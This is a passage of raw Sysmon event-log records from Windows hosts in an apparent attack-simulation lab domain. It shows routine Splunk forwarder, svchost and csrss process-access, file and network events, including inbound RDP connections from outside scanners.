dll.dll+51781 10341000x800000000000000049170Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:00.204{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049169Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:00.204{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049168Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:00.204{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049167Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:00.204{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049166Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:00.204{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049165Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:00.204{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049164Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:00.204{85C0FFC9-B7EC-607E-0500-00000000BB01}4161008C:\Windows\system32\csrss.exe{85C0FFC9-EACC-607E-CC06-00000000BB01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049163Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:00.204{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EACC-607E-CC06-00000000BB01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049162Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:00.205{85C0FFC9-EACC-607E-CC06-00000000BB01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000049182Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:01.813{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=493B81565511C3AC88DF40A2D567B6F8,SHA256=2100F92C94337A30756C27D93F76ED5B57C0515FF5DFDE4F1D22F69D6A2DB9D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062806Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:01.301{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F577F51A26D16079C6D47CE3DDEFB3E2,SHA256=56778B703264EBB7CDE5D7F7ECF72F9B4813B8D596EFFDE533D3FD63CEF013A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062805Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:01.114{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5ED9782E2A9465093E972C16EE8B3D6E,SHA256=31F4C0D9022559C53E0CF10F1F4435EE699713F1391BAB60D14D717D4D9931E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049181Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:01.329{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=750C5B7CE85AA227E9C9A5CF673FA9FE,SHA256=01215D38F034F73F81260C442D46A51F6A37BCD6D68D418A6E2CD2CAAE6EA12B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062804Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:59.110{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com57234-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062803Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:52:58.883{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-19974-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000049184Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:02.813{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0F8077B65DE1558F1AD4C223D13FA75,SHA256=805310A4292D7B45556BB034192ABA798F33C83AF22F217039F58D56EE3603DE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062818Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:02.613{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3CCD7312CC15D566230C1E6075673E6E,SHA256=D2120D9E1B531DC2DA1CC6A82A777ACF084FFFE5BC5F17BA0C6697738434F160,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000062817Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:02.504{A7A01FEF-EACE-607E-610B-00000000BB01}53765532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062816Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:02.364{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EACE-607E-610B-00000000BB01}5376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062815Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:02.364{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062814Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:02.364{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062813Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:02.364{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062812Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:02.364{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062811Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:02.364{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EACE-607E-610B-00000000BB01}5376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000062810Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:02.364{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EACE-607E-610B-00000000BB01}5376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000062809Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:02.364{A7A01FEF-EACE-607E-610B-00000000BB01}5376C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000062808Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:02.129{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FD85A9613321AE8EE1E477CF33D00B8,SHA256=0A5CB9392CAD76A6180107F1368495B77C7FA4F55B391834D1907C5BB84FC96C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049183Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:00.021{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-57948-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000062807Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:00.140{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57435-false10.0.1.12-8000- 23542300x800000000000000049187Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:03.860{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=539F4EEEB8B03B2376092CB2327C94AE,SHA256=DF3969A8B7B2890C5A416EC35E8E1BD78E7DCF213019E817345904A2B66F3DA5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000062840Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:03.863{A7A01FEF-EACF-607E-630B-00000000BB01}16286860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000062839Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:03.723{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5ECE60E22DCB2DE68FF53B86ABAE8149,SHA256=EBAD62FBD2DE127A332EC0A5C6A42D179A1B7AC3BE7FB4A50448F39062E5DAE6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000062838Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:03.723{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EACF-607E-630B-00000000BB01}1628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062837Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:03.723{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062836Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 